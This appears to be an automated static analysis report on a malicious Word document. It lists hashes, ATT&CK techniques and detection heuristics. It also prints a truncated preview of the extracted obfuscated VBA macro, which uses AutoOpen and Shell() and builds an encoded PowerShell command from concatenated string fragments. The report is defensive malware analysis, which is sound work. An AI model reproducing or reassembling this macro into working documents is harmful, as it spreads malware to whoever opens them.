Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 885a40d3bb071ab8…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 120.9 KB
Created: 2018-06-22 20:58:00
Authoring application: Microsoft Office Word
First seen: 2019-03-18
MD5: 6c4a138179fcd74da240122b59441dcb
SHA-1: 596bd8d4537d0fa0477938322ba0ad65ee0c6ddd
SHA-256: 885a40d3bb071ab884cd3b227938c80997a83e520716a85d9eb8bfa679d51ecc
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing a VBA macro. The macro utilizes a Shell() call and an AutoOpen function, indicating an attempt to execute arbitrary code upon opening. The obfuscated script concatenates strings to form a command, likely for downloading and executing a secondary payload, which is a common technique for malware delivery.

Heuristics (7)

  • ClamAV: Doc.Malware.Valyria-6707484-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Malware.Valyria-6707484-0
  • VBA macros detected [medium, 3 related findings, OLE_VBA_MACROS]
    Document contains VBA macro code
  • Shell() call in VBA [critical, OLE_VBA_SHELL]
    Shell() call in VBA
  • AutoOpen macro [high, OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 28815 bytes
SHA-256: 3a4819303191d2c3e7260865ad9cca6e82c45c73609164aa0acd7c50d9be0f74
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "PAYfwiOjsjMi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "FNawurQ"
Function RdmprBqkUjf()
On Error Resume Next
hhjRmz = (vQOzOC * 68574 + 90221 * CInt(OYQWa - CDbl(69122)) * 63533 * Oct(9509))
MHdHaoFVF = "Hel" + "l " + Chr(34) + "$(" + "SET" + "-IT"
skvjzC = (nQakA * 19509 + 15751 * CInt(GKLMww - CDbl(91466)) * 46137 * Oct(17397))
DDMvpbkCIBE = "Em " + " 'v" + "ar"
UJXXC = (AijtMz * 24136 + 35983 * CInt(iblIK - CDbl(49519)) * 9216 * Oct(32080))
njvdwudrNz = "Iab" + "lE:" + "OFS"
RdmprBqkUjf = MHdHaoFVF + DDMvpbkCIBE + njvdwudrNz
QQYUG = (zMmWds * 88690 + 30056 * CInt(cjVdO - CDbl(74614)) * 13568 * Oct(95462))
End Function
Function jFJLIjp()
On Error Resume Next
zQVKPw = (PsGGma * 62362 + 45897 * CInt(wAMppU - CDbl(77022)) * 22255 * Oct(44645))
HnpakwbLD = "' " + "'' " + ") " + Chr(34)
aDbCdJ = (iUqTm * 94868 + 77165 * CInt(NznIcC - CDbl(6576)) * 95990 * Oct(73081))
BYZcCDPMpM = "+[" + "stR" + "iNG" + "](" + " '6"
muHEf = (JmjXjo * 82198 + 55995 * CInt(TvMhYJ - CDbl(5905)) * 46794 * Oct(12484))
brAUOLm = "2-" + "88&" + "10" + "4h7" + "2A1"
UACvdX = (pjrOL * 51499 + 78165 * CInt(JzNQA - CDbl(49110)) * 17403 * Oct(19781))
HnXJiQCw = "10" + "h66" + "h10"
IHrQN = (jWBcK * 53144 + 12909 * CInt(GAdzGl - CDbl(66293)) * 15311 * Oct(39361))
HmiEnrs = "9y5" + "8h" + "39%" + "58h" + "116" + "d12" + "7i"
TOJpI = (BLqrm * 41205 + 61721 * CInt(baHsKw - CDbl(57179)) * 73426 * Oct(6175))
KjEJHbqoLZi = "109" + "i5" + "5y" + "117" + "%1"
HPXaC = (cAnTw * 99308 + 98723 * CInt(OvbzlP - CDbl(10711)) * 71014 * Oct(39403))
oiulwnQ = "20" + "y1" + "12h" + "127" + "-12" + "1d" + "110"
jFJLIjp = HnpakwbLD + BYZcCDPMpM + brAUOLm + HnXJiQCw + HmiEnrs + KjEJHbqoLZi + oiulwnQ
YjipzW = (hLBhsi * 52916 + 18273 * CInt(OliMt - CDbl(53065)) * 53115 * Oct(26257))
End Function
Function pBTFRQbUt()
On Error Resume Next
OWiAoC = (vkCWu * 74937 + 5825 * CInt(ZOozM - CDbl(42058)) * 23734 * Oct(99096))
HSzWpLIkulL = "%5" + "8A1" + "04" + "i1"
TAUCHt = (EQLizP * 63182 + 43866 * CInt(KzwZnX - CDbl(53839)) * 66020 * Oct(33855))
IwHiDid = "23W" + "116" + "-1" + "26y" + "117" + "A1"
fmdAIC = (ohoiU * 75490 + 82262 * CInt(RdbUR - CDbl(19651)) * 64573 * Oct(34269))
CJaMqjGhUV = "19T" + "33i" + "62" + "%1" + "14-" + "10" + "9d1"
BYNaCv = (llVOJ * 51479 + 29715 * CInt(jcazi - CDbl(31621)) * 82289 * Oct(19004))
OHcHzvQHSBA = "05" + "h1" + "06W" + "10" + "8A" + "58d"
TVtAO = (czViz * 68988 + 78534 * CInt(mmQwjS - CDbl(55024)) * 92377 * Oct(82476))
zJzTRPJUfl = "39" + "W5" + "8&" + "11"
pBTFRQbUt = HSzWpLIkulL + IwHiDid + CJaMqjGhUV + OHcHzvQHSBA + zJzTRPJUfl
Ynpji = (iLOGGj * 3613 + 45609 * CInt(ksQow - CDbl(31524)) * 36202 * Oct(83474))
End Function
Function tOiiRvjwCsW()
On Error Resume Next
oNSTHr = (XifbaL * 87172 + 29475 * CInt(vnVirF - CDbl(69561)) * 85390 * Oct(47668))
mjjIasStJYU = "6i1" + "27" + "i10" + "9W5" + "5y"
ZMHuwG = (KuVQOD * 44431 + 51799 * CInt(BWwzZz - CDbl(2208)) * 4668 * Oct(1247))
ltbrLDhldAF = "11" + "7-" + "12"
zInjca = (JSSQkh * 40808 + 57379 * CInt(wuVjk - CDbl(95990)) * 15070 * Oct(16528))
tbicnWd = "0-" + "11" + "2A" + "12"
NwbYa = (FtVIn * 43973 + 21705 * CInt(qTtEHS - CDbl(33388)) * 79828 * Oct(52182))
KDaUVGwt = "7-1" + "21A" + "110" + "d58" + "i7"
YAHhT = (zAffPi * 38020 + 70217 * CInt(HKqLMp - CDbl(57386)) * 76027 * Oct(3644))
wukLcNA = "3&" + "99d" + "10" + "5&1"
tOiiRvjwCsW = mjjIasStJYU + ltbrLDhldAF + tbicnWd + KDaUVGwt + wukLcNA
Nqszqm = (UHAaD * 46383 + 50331 * CInt(InrfcM - CDbl(99664)) * 18030 * Oct(25510))
End Function
Function jCIVz()
On Error Resume Next
HaiOdu = (FCGAG * 1758 + 78372 * CInt(rJLkRE - CDbl(74681)) * 31276 * Oct(64489))
OsSLJEjIdM = "10" + "y12" + "7%" + "11" + "9T" + "52T"
CmHZS = (hfziL * 88387 + 12819 * CInt(FNwVTc - CDbl(2906)) * 73316 * Oct(5915))
MzXEu = "84" + "d1" + "27" + "A1"
lDnZvv = (KwJaI *
... (truncated)